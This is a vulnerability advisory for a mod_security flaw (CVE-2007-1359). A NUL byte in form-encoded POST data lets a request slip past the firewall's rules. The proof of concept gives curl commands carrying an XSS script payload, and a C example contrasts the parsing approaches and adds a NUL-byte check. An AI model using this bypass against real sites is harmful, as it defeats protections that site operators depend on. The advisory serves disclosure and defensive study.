Mod_Security ASCIIZ Byte Security Restriction Bypass Vulnerability

Vulnerability ID: 1112379    Vulnerability type: Input validation
Published: 2007-03-07    Updated: 2008-07-15
CVE number: CVE-2007-1359    CNNVD-ID: CNNVD-200703-271
Platform: Multiple    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/3425
https://www.securityfocus.com/bid/22831
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-271
|Vulnerability details
mod_security is a web application firewall that is often used together with PHP. mod_security has a vulnerability in the way it handles certain HTTP data; a remote attacker could exploit it to bypass some security restrictions. After receiving a request, mod_security parses it into web application parameters. Because the way it parses inbound data follows the rules defined in the RFCs, which is not necessarily compatible with how the HTTP request parsers in Perl, Python, Java or PHP actually behave, a number of restriction-bypass vulnerabilities can exist wherever the RFC and the real implementations mismatch. One such mismatch is the handling of ASCIIZ (NUL) bytes in POST data of the application/x-www-form-urlencoded content type. Because mod_security handles this kind of POST data as a C string, it does not process anything after the first ASCIIZ byte, since in mod_security's view that byte marks the end of the data. This allows an attacker to easily bypass the rule restrictions and attack a protected site.
|Exploit (EXP)
mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability
http://www.php-security.org/MOPB/BONUS-12-2007.html

Affected is mod_security <= 2.1.0

Detailed information

When mod_security receives a request it parses it into web application 
parameters in a way it believes is correct. Because the way it parses 
the incoming data follows the rules defined in RFCs and not the reality 
of how the HTTP request parsers are implemented in Perl, Python, Java, 
PHP there are a number of bypass vulnerabilities when the RFC and 
reality mismatch. 

One of these differences is the way ASCIIZ bytes are handled when
they occur in POST data of the application/x-www-form-urlencoded 
content-type. Because mod_security handles POST data of this kind as a C 
string it does not touch anything behind the first ASCIIZ byte because 
in the eyes of mod_security this is the end of the data. 

Unfortunately for mod_security this is not how the HTTP parsers of the
different script languages handle this situation. Most script languages
(Perl, Python, ...) just ignore the ASCIIZ byte and parse the data as if
it is legal. Since PHP 5.2.0 this also applies to PHP.

Proof of concept, exploit or instructions to reproduce

<?php /* test.php: echo the var parameter back unchanged */ if (isset($_POST['var'])) echo($_POST['var']); ?>

Now call it with a command like 

$ echo -e "&var=<script>alert(/xss/);</script>" > postdata 
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent 
<script>alert(/xss/);</script> 

The example should not be blocked (because this is the default 
configuration) but in your error.log you will find a line saying that a 
possible XSS attack was detected. 

Now try the same with an ASCIIZ byte embedded.

$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata 
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent 
<script>alert(/xss/);</script> 

This time there should be no log message in your error.log, because 
mod_security cannot see the var parameter behind the ASCIIZ byte.

# milw0rm.com [2007-03-07]
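The parsing mismatch described above, as an added C example that is not part of the advisory or of mod_security's own code: a parser that treats the body as a C string never sees the var parameter behind the NUL byte, a length-aware parser over the same bytes does, and a WAF can flag the raw NUL on its own as a signal. The body string, parameter names and function names are constructed for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed request body matching the advisory's second curl call: a NUL
 * byte, then "&var=...". BODY_LEN is what Content-Length would report. */
static const char BODY[] = "\0&var=<script>alert(/xss/);</script>";
static const size_t BODY_LEN = sizeof(BODY) - 1;   /* drop the terminator */

/* Length-aware parser: walks exactly body_len bytes, so a NUL is just
 * another byte. This mirrors how Perl, Python and PHP >= 5.2.0 behave. */
bool has_param_len(const char *body, size_t body_len, const char *name) {
    size_t name_len = strlen(name);
    for (size_t i = 0; i + name_len < body_len; i++) {
        bool at_start = (i == 0 || body[i - 1] == '&');
        if (at_start && memcmp(body + i, name, name_len) == 0 &&
            body[i + name_len] == '=')
            return true;
    }
    return false;
}

/* C-string parser: the flawed style. strlen() stops at the first NUL, so
 * for BODY the parser is handed a length of 0 and never sees "var". */
bool has_param_cstr(const char *body, const char *name) {
    return has_param_len(body, strlen(body), name);
}

/* Defensive check for a WAF: a raw NUL never belongs in form-urlencoded
 * data (it would be sent as %00), so its presence alone can be flagged. */
bool body_has_nul(const char *body, size_t body_len) {
    return memchr(body, '\0', body_len) != NULL;
}

int main(void) {
    printf("C-string parser sees var: %s\n",
           has_param_cstr(BODY, "var") ? "yes" : "no");
    printf("length-aware parser sees var: %s\n",
           has_param_len(BODY, BODY_LEN, "var") ? "yes" : "no");
    printf("body contains raw NUL: %s\n",
           body_has_nul(BODY, BODY_LEN) ? "yes" : "no");
    return 0;
}
```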
|Affected products
Oracle Oracle10g Application Server 10.1.3.3.0
Oracle Oracle10g Application Server 10.1.3.2.0
Oracle Oracle10g Application Server 10.1.3.1.0
Oracle Oracle10g Application Server 10.1.3.0.0
|References

Source: XF
Name: modsecurity-formurlencoded-security-bypass(32872)
Link: http://xforce.iss.net/xforce/xfdb/32872
Source: BID
Name: 22831
Link: http://www.securityfocus.com/bid/22831
Source: MISC
Link: http://www.php-security.org/MOPB/BONUS-12-2007.html
Source: OSVDB
Name: 32778
Link: http://www.osvdb.org/32778
Source: www.modsecurity.org
Link: http://www.modsecurity.org/blog/archives/2007/03/modsecurity_asc.html
Source: GENTOO
Name: GLSA-200705-17
Link: http://www.gentoo.org/security/en/glsa/glsa-200705-17.xml
Source: VUPEN
Name: ADV-2007-0868
Link: http://www.frsirt.com/english/advisories/2007/0868
Source: SECUNIA
Name: 25316
Link: http://secunia.com/advisories/25316
Source: SECUNIA
Name: 24373
Link: http://secunia.com/advisories/24373
Source: www.oracle.com
Link: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
Source: VUPEN
Name: ADV-2008-2115
Link: http://www.frsirt.com/english/advisories/2008/2115
Source: VUPEN
Name: ADV-2008-2109
Link: http://www.frsirt.com/english/advisories/2008/2109/references
Source: SECUNIA
Name: 31113
Link: http://secunia.com/advisories/31113
Source: SEC